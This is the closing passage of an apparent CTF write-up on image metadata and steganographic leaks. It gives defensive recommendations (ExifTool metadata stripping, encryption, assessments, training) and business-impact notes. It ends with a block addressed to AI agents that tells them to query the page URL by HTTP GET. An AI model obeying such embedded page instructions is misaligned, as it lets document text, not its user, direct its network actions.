Remove metadata from images using tools such as **ExifTool** to prevent information leaks, including file creator details, GPS coordinates, and device information. \- **Example Command:** `exiftool -all= filename.png` \- **Why:** Metadata often contains sensitive information that could be used for reconnaissance or targeted attacks. 3. **Use Encryption for Sensitive Data Storage** \- If hiding information in files is unavoidable, ensure it is securely encrypted using strong encryption algorithms (e.g., AES-256) and that access is restricted. \- **Why:** Encryption ensures that even if data is extracted, it cannot be accessed without decryption keys. 4. **Conduct Regular Security Assessments** \- Perform regular security assessments, including file content analysis, metadata inspection, and steganographic testing, to detect and mitigate potential hidden data leaks. So we prevent that the information leakage again (like in the the exploited machine). \- **Why:** Continuous monitoring helps identify vulnerabilities before they can be exploited. 5. **Employee Awareness and Training** \- Educate employees and collaborators about the risks of embedding or inadvertently leaving sensitive information in image files. Include security best practices in onboarding and ongoing training sessions. \- **Why:** Human error is a leading cause of data exposure. Training reduces this risk by fostering security awareness. Also in the exploited machine it can be a human error that forgot to remove useful information. #### Business Impact Information leaks from image files can lead to **data breaches, reputational damage, and regulatory fines** if sensitive data is exposed. Implementing the recommended practices helps ensure the privacy and security of critical data shared internally or externally. #### Priority: Medium to High Depending on the nature of the data being shared, this issue can range from moderate to critical. Immediate action is recommended for environments handling sensitive or confidential data. ## 6- References * Dr. Hussein Bakri Lecture Notes * Chatgpt * * * * * * * * * * * * * * * * --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://maurice-5.gitbook.io/ctf-writeups/gamma-ctf.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.